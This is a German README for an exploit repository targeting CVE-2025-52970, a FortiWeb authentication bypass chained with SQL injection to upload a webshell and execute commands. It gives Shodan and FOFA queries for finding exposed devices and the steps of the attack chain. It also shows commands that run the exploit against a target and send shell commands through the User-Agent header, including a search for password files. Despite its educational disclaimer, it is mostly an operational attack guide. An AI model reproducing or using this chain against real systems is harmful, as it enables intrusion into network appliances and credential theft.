
Demonstriert einen Authentifizierungsbypass in FortiWeb (CVE-2025-52970), kombiniert mit SQL-Injection, um eine Webshell hochzuladen und Remote-Code-Ausführung über HTTP-Header zu erreichen.
Dieses Repository demonstriert eine Authentifizierungsumgehung in FortiWeb, die genutzt werden kann, um Remote Code Execution (RCE) zu erreichen.
Der Exploit nutzt einen verwundbaren Endpunkt, um SQL-Payloads zu injizieren, eine Webshell hochzuladen und Befehle über HTTP-Header auszuführen.
⚠️ Haftungsausschluss:
Dieses Projekt dient ausschließlich Bildungs- und Forschungszwecken.
Verwenden Sie es NICHT gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
Komponente: FortiWeb Fabric API (/api/fabric/device/status)
Auswirkung: Authentifizierungsumgehung → SQL-Injection → Webshell-Upload → RCE
Vektor: Manipulierter Authorization-Header + SQL-Injection
Temporäre SQL-Tabelle löschen und erstellen.
Webshell-Payload in Teilen schreiben.
Shell nach /cgi-bin/x.cgi exportieren.
Helfendes Python-Skript hochladen, um Berechtigungen auszulösen.
Auf Webshell zugreifen, indem Befehle über den User-Agent-Header gesendet werden.
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ Mit der Webshell interagieren
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
